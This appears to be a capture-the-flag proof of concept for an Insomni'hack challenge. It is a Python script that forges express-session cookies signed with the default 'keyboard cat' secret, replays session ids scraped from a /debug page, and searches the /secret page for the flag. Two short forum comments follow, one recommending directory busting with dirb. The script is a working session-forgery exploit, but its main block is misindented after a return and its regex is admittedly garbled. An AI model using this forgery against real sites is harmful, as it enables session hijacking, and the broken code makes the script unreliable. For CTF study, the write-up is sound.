
poc.py:
```python
import re
import hmac
import base64
import hashlib
import requests

# https://github.com/expressjs/session/search?q=secret&unscoped_q=secret
# The example secret shipped in the express-session docs. The PoC assumes the
# target signs its session cookies with this value unchanged; a random,
# deployment-specific secret is what makes the forgery below impossible.
secret = 'keyboard cat'
# https://devstore.io/js/express-authentication
# Static header sent on every request; presumably what the challenge's
# express-authentication middleware checks (see get_secret / get_debug).
auth_header = {'Authorization': 'secret'}

def sign(msg, key):
    """Sign *msg* with *key* the way node-cookie-signature does.

    https://github.com/tj/node-cookie-signature/blob/master/index.js
    Computes HMAC-SHA256 over the UTF-8 bytes of *msg*, base64-encodes the
    digest and drops the trailing ``=`` padding. The result is the part that
    follows the ``.`` in an express-session ``connect.sid`` cookie value.
    """
    mac = hmac.new(key.encode('utf-8'), msg.encode('utf-8'), hashlib.sha256)
    encoded = base64.b64encode(mac.digest()).decode()
    return encoded.rstrip('=')

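def get_secret(cookie):
    """GET /secret with the shared Authorization header and *cookie*.

    *cookie* is the dict handed to ``requests`` as the cookie jar; the caller
    builds the ``connect.sid`` entry. Returns the response body as text.
    """
    url = 'http://secretus.insomnihack.ch/secret'
    # timeout= so an unresponsive server cannot hang the script indefinitely.
    resp = requests.get(url, headers=auth_header, cookies=cookie, timeout=10)
    return resp.text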

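def get_debug():
    """GET /debug and extract the session ids listed on it.

    Returns the list of first capture groups of ``match_session`` over the
    response body.
    """
    url = 'http://secretus.insomnihack.ch/debug'
    # NOTE(review): part of this pattern was lost when the writeup was
    # rendered (the stray bullets look like swallowed HTML list tags); confirm
    # the exact regex against the original before relying on it.
    match_session = r"(.+)\.json?"
    # timeout= so an unresponsive server cannot hang the script indefinitely.
    resp = requests.get(url, headers=auth_header, timeout=10)
    return re.findall(match_session, resp.text)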

    if __name__ == '__main__':
        # An express-session cookie is 's:' + sid + '.' + sign(sid, secret),
        # so with the secret known every sid exposed on /debug can be re-signed
        # and presented as a valid session.
        flag_pat = r"INS{.+}"
        for sess in get_debug():
            print(sess)
            forged = {'connect.sid': 's:' + sess + '.' + sign(sess, secret)}
            html = get_secret(forged)
            found = re.findall(flag_pat, html)
            if found:
                print(found)
                break
```

palko — Jan. 19, 2020, 2:45 p.m.

How the heck was one supposed to guess the /debug URL?


digaleev — Jan. 20, 2020, 7:56 a.m.

>>> How the heck was one supposed to guess the /debug URL?

    Using directory busting, so tools like dirb or dirbuster will be helpful.